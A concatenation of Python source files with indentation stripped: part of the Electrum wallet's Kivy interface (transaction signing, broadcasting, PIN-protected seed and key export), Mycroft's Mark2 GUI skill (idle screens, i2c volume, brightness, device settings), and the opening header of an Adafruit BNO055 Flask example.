__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
__init__.py
|
# Copyright 2018 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import astral
import time
import arrow
from pytz import timezone
from datetime import datetime
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill
from mycroft.util import get_ipc_directory
from mycroft.util.log import LOG
from mycroft.util.parse import normalize
from mycroft import intent_file_handler
import os
import subprocess
import pyaudio
from threading import Thread, Lock
from .listener import (get_rms, open_mic_stream, read_file_from,
INPUT_FRAMES_PER_BLOCK)
# Definitions used when sending volume over i2c
VOL_MAX = 30
VOL_OFFSET = 15
VOL_SMAX = VOL_MAX - VOL_OFFSET
VOL_ZERO = 0
def compare_origin(m1, m2):
origin1 = m1.data['__from'] if isinstance(m1, Message) else m1
origin2 = m2.data['__from'] if isinstance(m2, Message) else m2
return origin1 == origin2
def clip(val, minimum, maximum):
""" Clips / limits a value to a specific range.
Arguments:
val: value to be limited
minimum: minimum allowed value
maximum: maximum allowed value
"""
return min(max(val, minimum), maximum)
class Mark2(MycroftSkill):
"""
The Mark2 skill handles much of the gui activities related to
Mycroft's core functionality. This includes showing "listening",
"thinking", and "speaking" faces as well as more complicated things
such as switching to the selected resting face and handling
system signals.
"""
def __init__(self):
super().__init__('Mark2')
self.i2c_channel = 1
self.idle_screens = {}
self.override_idle = None
self.idle_next = 0 # Next time the idle screen should trigger
self.idle_lock = Lock()
self.settings['auto_brightness'] = False
self.settings['use_listening_beep'] = True
self.has_show_page = False # resets with each handler
# Volume indicatior
self.thread = None
self.pa = pyaudio.PyAudio()
try:
self.listener_file = os.path.join(get_ipc_directory(), 'mic_level')
self.st_results = os.stat(self.listener_file)
except Exception:
self.listener_file = None
self.st_results = None
self.max_amplitude = 0.001
# System volume
self.volume = 0.5
self.muted = False
self.get_hardware_volume() # read from the device
def setup_mic_listening(self):
""" Initializes PyAudio, starts an input stream and launches the
listening thread.
"""
listener_conf = self.config_core['listener']
self.stream = open_mic_stream(self.pa,
listener_conf.get('device_index'),
listener_conf.get('device_name'))
self.amplitude = 0
def initialize(self):
""" Perform initalization.
Registers messagebus handlers and sets default gui values.
"""
enclosure_info = self.config_core.get('enclosure', {})
self.i2c_channel = enclosure_info.get('i2c_channel',
self.i2c_channel)
self.brightness_dict = self.translate_namedvalues('brightness.levels')
self.gui['volume'] = 0
# Prepare GUI Viseme structure
self.gui['viseme'] = {'start': 0, 'visemes': []}
# Preselect Time and Date as resting screen
self.gui['selected'] = self.settings.get('selected', 'Time and Date')
self.gui.set_on_gui_changed(self.save_resting_screen)
try:
self.add_event('mycroft.internet.connected',
self.handle_internet_connected)
# Handle the 'waking' visual
self.add_event('recognizer_loop:record_begin',
self.handle_listener_started)
self.add_event('recognizer_loop:record_end',
self.handle_listener_ended)
self.add_event('mycroft.speech.recognition.unknown',
self.handle_failed_stt)
# Handle the 'busy' visual
self.bus.on('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.on('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.on('mycroft.awoken',
self.on_handler_awoken)
self.bus.on('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.on('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.on('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.on('gui.page.show',
self.on_gui_page_show)
self.bus.on('gui.page_interaction', self.on_gui_page_interaction)
self.bus.on('mycroft.skills.initialized', self.reset_face)
self.bus.on('mycroft.mark2.register_idle',
self.on_register_idle)
self.add_event('mycroft.mark2.reset_idle',
self.restore_idle_screen)
# Handle device settings events
self.add_event('mycroft.device.settings',
self.handle_device_settings)
# Use Legacy for QuickSetting delegate
self.gui.register_handler('mycroft.device.settings',
self.handle_device_settings)
self.gui.register_handler('mycroft.device.settings.homescreen',
self.handle_device_homescreen_settings)
self.gui.register_handler('mycroft.device.settings.ssh',
self.handle_device_ssh_settings)
self.gui.register_handler('mycroft.device.settings.reset',
self.handle_device_factory_reset_settings)
self.gui.register_handler('mycroft.device.settings.update',
self.handle_device_update_settings)
self.gui.register_handler('mycroft.device.settings.restart',
self.handle_device_restart_action)
self.gui.register_handler('mycroft.device.settings.poweroff',
self.handle_device_poweroff_action)
self.gui.register_handler('mycroft.device.settings.wireless',
self.handle_show_wifi_screen_intent)
self.gui.register_handler('mycroft.device.show.idle',
self.show_idle_screen)
# Handle idle selection
self.gui.register_handler('mycroft.device.set.idle',
self.set_idle_screen)
# System events
self.add_event('system.reboot', self.handle_system_reboot)
self.add_event('system.shutdown', self.handle_system_shutdown)
# Handle volume setting via I2C
self.add_event('mycroft.volume.set', self.on_volume_set)
self.add_event('mycroft.volume.get', self.on_volume_get)
# Show loading screen while starting up skills.
# self.gui['state'] = 'loading'
# self.gui.show_page('all.qml')
# Collect Idle screens and display if skill is restarted
self.collect_resting_screens()
except Exception:
LOG.exception('In Mark 2 Skill')
# Update use of wake-up beep
self._sync_wake_beep_setting()
self.settings_change_callback = self.on_websettings_changed
def start_listening_thread(self):
# Start listening thread
if not self.thread:
self.running = True
self.thread = Thread(target=self.listen_thread)
self.thread.daemon = True
self.thread.start()
def stop_listening_thread(self):
if self.thread:
self.running = False
self.thread.join()
self.thread = None
###################################################################
# System events
def handle_system_reboot(self, message):
self.speak_dialog('rebooting', wait=True)
subprocess.call(['/usr/bin/systemctl', 'reboot'])
def handle_system_shutdown(self, message):
subprocess.call(['/usr/bin/systemctl', 'poweroff'])
###################################################################
# System volume
def on_volume_set(self, message):
""" Force vol between 0.0 and 1.0. """
vol = message.data.get("percent", 0.5)
vol = clip(vol, 0.0, 1.0)
self.volume = vol
self.muted = False
self.set_hardware_volume(vol)
self.show_volume = True
def on_volume_get(self, message):
""" Handle request for current volume. """
self.bus.emit(message.response(data={'percent': self.volume,
'muted': self.muted}))
def set_hardware_volume(self, pct):
""" Set the volume on hardware (which supports levels 0-63).
Arguments:
pct (int): audio volume (0.0 - 1.0).
"""
vol = int(VOL_SMAX * pct + VOL_OFFSET) if pct >= 0.01 else VOL_ZERO
self.log.debug('Setting hardware volume to: {}'.format(pct))
command = ['i2cset',
'-y', # force a write
str(self.i2c_channel), # i2c bus number
'0x4b', # stereo amp device addr
str(vol)] # volume level, 0-63
self.log.info(' '.join(command))
try:
subprocess.call(command)
except Exception as e:
self.log.error('Couldn\'t set volume. ({})'.format(e))
def get_hardware_volume(self):
# Get the volume from hardware
command = ['i2cget', '-y', str(self.i2c_channel), '0x4b']
self.log.info(' '.join(command))
try:
vol = subprocess.check_output(command)
# Convert the returned hex value from i2cget
hw_vol = int(vol, 16)
hw_vol = clip(hw_vol, 0, 63)
self.volume = clip((hw_vol - VOL_OFFSET) / VOL_SMAX, 0.0, 1.0)
except subprocess.CalledProcessError as e:
self.log.info('I2C Communication error: {}'.format(repr(e)))
except FileNotFoundError:
self.log.info('i2cget couldn\'t be found')
except Exception:
self.log.info('UNEXPECTED VOLUME RESULT: {}'.format(vol))
###################################################################
# Idle screen mechanism
def save_resting_screen(self):
""" Handler to be called if the settings are changed by
the GUI.
Stores the selected idle screen.
"""
self.log.debug("Saving resting screen")
self.settings['selected'] = self.gui['selected']
self.gui['selectedScreen'] = self.gui['selected']
def collect_resting_screens(self):
""" Trigger collection and then show the resting screen. """
self.bus.emit(Message('mycroft.mark2.collect_idle'))
time.sleep(1)
self.show_idle_screen()
def on_register_idle(self, message):
""" Handler for catching incoming idle screens. """
if 'name' in message.data and 'id' in message.data:
self.idle_screens[message.data['name']] = message.data['id']
self.log.info('Registered {}'.format(message.data['name']))
else:
self.log.error('Malformed idle screen registration received')
def reset_face(self, message):
""" Triggered after skills are initialized.
Sets switches from resting "face" to a registered resting screen.
"""
time.sleep(1)
self.collect_resting_screens()
def listen_thread(self):
""" listen on mic input until self.running is False. """
self.setup_mic_listening()
self.log.debug("Starting listening")
while(self.running):
self.listen()
self.stream.close()
self.log.debug("Listening stopped")
def get_audio_level(self):
""" Get level directly from audio device. """
try:
block = self.stream.read(INPUT_FRAMES_PER_BLOCK)
except IOError as e:
# damn
self.errorcount += 1
self.log.error('{} Error recording: {}'.format(self.errorcount, e))
return None
amplitude = get_rms(block)
result = int(amplitude / ((self.max_amplitude) + 0.001) * 15)
self.max_amplitude = max(amplitude, self.max_amplitude)
return result
def get_listener_level(self):
""" Get level from IPC file created by listener. """
time.sleep(0.05)
if not self.listener_file:
try:
self.listener_file = os.path.join(get_ipc_directory(),
'mic_level')
except FileNotFoundError:
return None
try:
st_results = os.stat(self.listener_file)
if (not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
ret = read_file_from(self.listener_file, 0)
self.st_results = st_results
if ret is not None:
if ret > self.max_amplitude:
self.max_amplitude = ret
ret = int(ret / self.max_amplitude * 10)
return ret
except Exception as e:
self.log.error(repr(e))
return None
def listen(self):
""" Read microphone level and store rms into self.gui['volume']. """
amplitude = self.get_audio_level()
# amplitude = self.get_listener_level()
if (self.gui and
('volume' not in self.gui or self.gui['volume'] != amplitude) and
amplitude is not None):
self.gui['volume'] = amplitude
def restore_idle_screen(self, _=None):
if (self.override_idle and
time.monotonic() - self.override_idle[1] > 2):
self.override_idle = None
self.show_idle_screen()
def stop(self, message=None):
""" Clear override_idle and stop visemes. """
self.restore_idle_screen()
self.gui['viseme'] = {'start': 0, 'visemes': []}
return False
def shutdown(self):
# Gotta clean up manually since not using add_event()
self.bus.remove('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.remove('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.remove('mycroft.awoken',
self.on_handler_awoken)
self.bus.remove('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.remove('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.remove('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.remove('gui.page.show',
self.on_gui_page_show)
self.bus.remove('gui.page_interaction', self.on_gui_page_interaction)
self.bus.remove('mycroft.mark2.register_idle', self.on_register_idle)
self.stop_listening_thread()
#####################################################################
# Manage "busy" visual
def on_handler_started(self, message):
handler = message.data.get("handler", "")
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
def on_gui_page_interaction(self, message):
""" Reset idle timer to 30 seconds when page is flipped. """
self.log.info("Resetting idle counter to 30 seconds")
self.start_idle_event(30)
def on_gui_page_show(self, message):
if 'mark-2' not in message.data.get('__from', ''):
# Some skill other than the handler is showing a page
self.has_show_page = True
# If a skill overrides the idle do not switch page
override_idle = message.data.get('__idle')
if override_idle is True:
# Disable idle screen
self.log.info('Cancelling Idle screen')
self.cancel_idle_event()
self.override_idle = (message, time.monotonic())
elif isinstance(override_idle, int) and override_idle is not False:
# Set the indicated idle timeout
self.log.info('Overriding idle timer to'
' {} seconds'.format(override_idle))
self.start_idle_event(override_idle)
elif (message.data['page'] and
not message.data['page'][0].endswith('idle.qml')):
# Check if the show_page deactivates a previous idle override
# This is only possible if the page is from the same skill
if (override_idle is False and
compare_origin(message, self.override_idle[0])):
# Remove the idle override page if override is set to false
self.override_idle = None
# Set default idle screen timer
self.start_idle_event(30)
def on_handler_mouth_reset(self, message):
""" Restore viseme to a smile. """
pass
def on_handler_sleep(self, message):
""" Show resting face when going to sleep. """
self.gui['state'] = 'resting'
self.gui.show_page('all.qml')
def on_handler_awoken(self, message):
""" Show awake face when sleep ends. """
self.gui['state'] = 'awake'
self.gui.show_page('all.qml')
def on_handler_complete(self, message):
""" When a skill finishes executing clear the showing page state. """
handler = message.data.get('handler', '')
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
self.has_show_page = False
try:
if self.hourglass_info[handler] == -1:
self.enclosure.reset()
del self.hourglass_info[handler]
except Exception:
# There is a slim chance the self.hourglass_info might not
# be populated if this skill reloads at just the right time
# so that it misses the mycroft.skill.handler.start but
# catches the mycroft.skill.handler.complete
pass
#####################################################################
# Manage "speaking" visual
def on_handler_speaking(self, message):
""" Show the speaking page if no skill has registered a page
to be shown in it's place.
"""
self.gui["viseme"] = message.data
if not self.has_show_page:
self.gui['state'] = 'speaking'
self.gui.show_page("all.qml")
# Show idle screen after the visemes are done (+ 2 sec).
time = message.data['visemes'][-1][1] + 5
self.start_idle_event(time)
#####################################################################
# Manage "idle" visual state
def cancel_idle_event(self):
self.idle_next = 0
self.cancel_scheduled_event('IdleCheck')
def start_idle_event(self, offset=60, weak=False):
""" Start an event for showing the idle screen.
Arguments:
offset: How long until the idle screen should be shown
weak: set to true if the time should be able to be overridden
"""
with self.idle_lock:
if time.monotonic() + offset < self.idle_next:
self.log.info('No update, before next time')
return
self.log.info('Starting idle event')
try:
if not weak:
self.idle_next = time.monotonic() + offset
# Clear any existing checker
self.cancel_scheduled_event('IdleCheck')
time.sleep(0.5)
self.schedule_event(self.show_idle_screen, int(offset),
name='IdleCheck')
self.log.info('Showing idle screen in '
'{} seconds'.format(offset))
except Exception as e:
self.log.exception(repr(e))
def show_idle_screen(self):
""" Show the idle screen or return to the skill that's overriding idle.
"""
self.log.debug('Showing idle screen')
screen = None
if self.override_idle:
self.log.debug('Returning to override idle screen')
# Restore the page overriding idle instead of the normal idle
self.bus.emit(self.override_idle[0])
elif len(self.idle_screens) > 0 and 'selected' in self.gui:
# TODO remove hard coded value
self.log.debug('Showing Idle screen for '
'{}'.format(self.gui['selected']))
screen = self.idle_screens.get(self.gui['selected'])
if screen:
self.bus.emit(Message('{}.idle'.format(screen)))
def handle_listener_started(self, message):
""" Shows listener page after wakeword is triggered.
Starts countdown to show the idle page.
"""
# Start idle timer
self.cancel_idle_event()
self.start_idle_event(weak=True)
# Lower the max by half at the start of listener to make sure
# loud noices doesn't make the level stick to much
if self.max_amplitude > 0.001:
self.max_amplitude /= 2
self.start_listening_thread()
# Show listening page
self.gui['state'] = 'listening'
self.gui.show_page('all.qml')
def handle_listener_ended(self, message):
""" When listening has ended show the thinking animation. """
self.has_show_page = False
self.gui['state'] = 'thinking'
self.gui.show_page('all.qml')
self.stop_listening_thread()
def handle_failed_stt(self, message):
""" No discernable words were transcribed. Show idle screen again. """
self.show_idle_screen()
#####################################################################
# Manage network connction feedback
def handle_internet_connected(self, message):
""" System came online later after booting. """
self.enclosure.mouth_reset()
#####################################################################
# Web settings
def on_websettings_changed(self):
""" Update use of wake-up beep. """
self._sync_wake_beep_setting()
def _sync_wake_beep_setting(self):
""" Update "use beep" global config from skill settings. """
from mycroft.configuration.config import (
LocalConf, USER_CONFIG, Configuration
)
config = Configuration.get()
use_beep = self.settings.get('use_listening_beep') is True
if not config['confirm_listening'] == use_beep:
# Update local (user) configuration setting
new_config = {
'confirm_listening': use_beep
}
user_config = LocalConf(USER_CONFIG)
user_config.merge(new_config)
user_config.store()
self.bus.emit(Message('configuration.updated'))
#####################################################################
# Brightness intent interaction
def percent_to_level(self, percent):
""" Converts the brigtness value from percentage to a
value the Arduino can read
Arguments:
percent (int): interger value from 0 to 100
return:
(int): value form 0 to 30
"""
return int(float(percent) / float(100) * 30)
def parse_brightness(self, brightness):
""" Parse text for brightness percentage.
Arguments:
brightness (str): string containing brightness level
Returns:
(int): brightness as percentage (0-100)
"""
try:
# Handle "full", etc.
name = normalize(brightness)
if name in self.brightness_dict:
return self.brightness_dict[name]
if '%' in brightness:
brightness = brightness.replace("%", "").strip()
return int(brightness)
if 'percent' in brightness:
brightness = brightness.replace("percent", "").strip()
return int(brightness)
i = int(brightness)
if i < 0 or i > 100:
return None
if i < 30:
# Assmume plain 0-30 is "level"
return int((i * 100.0) / 30.0)
# Assume plain 31-100 is "percentage"
return i
except Exception:
return None # failed in an int() conversion
def set_screen_brightness(self, level, speak=True):
""" Actually change screen brightness.
Arguments:
level (int): 0-30, brightness level
speak (bool): when True, speak a confirmation
"""
# TODO CHANGE THE BRIGHTNESS
if speak is True:
percent = int(float(level) * float(100) / float(30))
self.speak_dialog(
'brightness.set', data={'val': str(percent) + '%'})
def _set_brightness(self, brightness):
# brightness can be a number or word like "full", "half"
percent = self.parse_brightness(brightness)
if percent is None:
self.speak_dialog('brightness.not.found.final')
elif int(percent) is -1:
self.handle_auto_brightness(None)
else:
self.auto_brightness = False
self.set_screen_brightness(self.percent_to_level(percent))
@intent_file_handler('brightness.intent')
def handle_brightness(self, message):
""" Intent handler to set custom screen brightness.
Arguments:
message (dict): messagebus message from intent parser
"""
brightness = (message.data.get('brightness', None) or
self.get_response('brightness.not.found'))
if brightness:
self._set_brightness(brightness)
def _get_auto_time(self):
""" Get dawn, sunrise, noon, sunset, and dusk time.
Returns:
times (dict): dict with associated (datetime, level)
"""
tz = self.location['timezone']['code']
lat = self.location['coordinate']['latitude']
lon = self.location['coordinate']['longitude']
ast_loc = astral.Location()
ast_loc.timezone = tz
ast_loc.lattitude = lat
ast_loc.longitude = lon
user_set_tz = \
timezone(tz).localize(datetime.now()).strftime('%Z')
device_tz = time.tzname
if user_set_tz in device_tz:
sunrise = ast_loc.sun()['sunrise']
noon = ast_loc.sun()['noon']
sunset = ast_loc.sun()['sunset']
else:
secs = int(self.location['timezone']['offset']) / -1000
sunrise = arrow.get(
ast_loc.sun()['sunrise']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
noon = arrow.get(
ast_loc.sun()['noon']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
sunset = arrow.get(
ast_loc.sun()['sunset']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
return {
'Sunrise': (sunrise, 20), # high
'Noon': (noon, 30), # full
'Sunset': (sunset, 5) # dim
}
def schedule_brightness(self, time_of_day, pair):
""" Schedule auto brightness with the event scheduler.
Arguments:
time_of_day (str): Sunrise, Noon, Sunset
pair (tuple): (datetime, brightness)
"""
d_time = pair[0]
brightness = pair[1]
now = arrow.now()
arw_d_time = arrow.get(d_time)
data = (time_of_day, brightness)
if now.timestamp > arw_d_time.timestamp:
d_time = arrow.get(d_time).shift(hours=+24)
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
else:
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
@intent_file_handler('brightness.auto.intent')
def handle_auto_brightness(self, message):
""" brightness varies depending on time of day
Arguments:
message (Message): messagebus message from intent parser
"""
self.auto_brightness = True
auto_time = self._get_auto_time()
nearest_time_to_now = (float('inf'), None, None)
for time_of_day, pair in auto_time.items():
self.schedule_brightness(time_of_day, pair)
now = arrow.now().timestamp
t = arrow.get(pair[0]).timestamp
if abs(now - t) < nearest_time_to_now[0]:
nearest_time_to_now = (abs(now - t), pair[1], time_of_day)
self.set_screen_brightness(nearest_time_to_now[1], speak=False)
def _handle_screen_brightness_event(self, message):
""" Wrapper for setting screen brightness from eventscheduler
Arguments:
message (Message): messagebus message
"""
if self.auto_brightness is True:
time_of_day = message.data[0]
level = message.data[1]
self.cancel_scheduled_event(time_of_day)
self.set_screen_brightness(level, speak=False)
pair = self._get_auto_time()[time_of_day]
self.schedule_brightness(time_of_day, pair)
#####################################################################
# Device Settings
@intent_file_handler('device.settings.intent')
def handle_device_settings(self, message):
""" Display device settings page. """
self.gui['state'] = 'settings/settingspage'
self.gui.show_page('all.qml')
@intent_file_handler('device.wifi.settings.intent')
def handle_show_wifi_screen_intent(self, message):
""" display network selection page. """
self.gui.clear()
self.gui['state'] = 'settings/networking/SelectNetwork'
self.gui.show_page('all.qml')
@intent_file_handler('device.homescreen.settings.intent')
def handle_device_homescreen_settings(self, message):
"""
display homescreen settings page
"""
screens = [{'screenName': s, 'screenID': self.idle_screens[s]}
for s in self.idle_screens]
self.gui['idleScreenList'] = {'screenBlob': screens}
self.gui['selectedScreen'] = self.gui['selected']
self.gui['state'] = 'settings/homescreen_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.ssh.settings.intent')
def handle_device_ssh_settings(self, message):
""" Display ssh settings page. """
self.gui['state'] = 'settings/ssh_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.reset.settings.intent')
def handle_device_factory_reset_settings(self, message):
""" Display device factory reset settings page. """
self.gui['state'] = 'settings/factoryreset_settings'
self.gui.show_page('all.qml')
def set_idle_screen(self, message):
""" Set selected idle screen from message. """
self.gui['selected'] = message.data['selected']
self.save_resting_screen()
def handle_device_update_settings(self, message):
""" Display device update settings page. """
self.gui['state'] = 'settings/updatedevice_settings'
self.gui.show_page('all.qml')
def handle_device_restart_action(self, message):
""" Device restart action. """
self.log.info('PlaceholderRestartAction')
def handle_device_poweroff_action(self, message):
""" Device poweroff action. """
self.log.info('PlaceholderShutdownAction')
def create_skill():
return Mark2()
|
server.py
|
# Adafruit BNO055 WebGL Example
#
# Requires the flask web framework to be installed. See http://flask.pocoo.org/
# for installation instructions, however on a Linux machine like the Raspberry
# Pi or BeagleBone black you can likely install it by running:
# sudo apt-get update
# sudo apt-get install python3-flask
#
# Copyright (c) 2015 Adafruit Industries
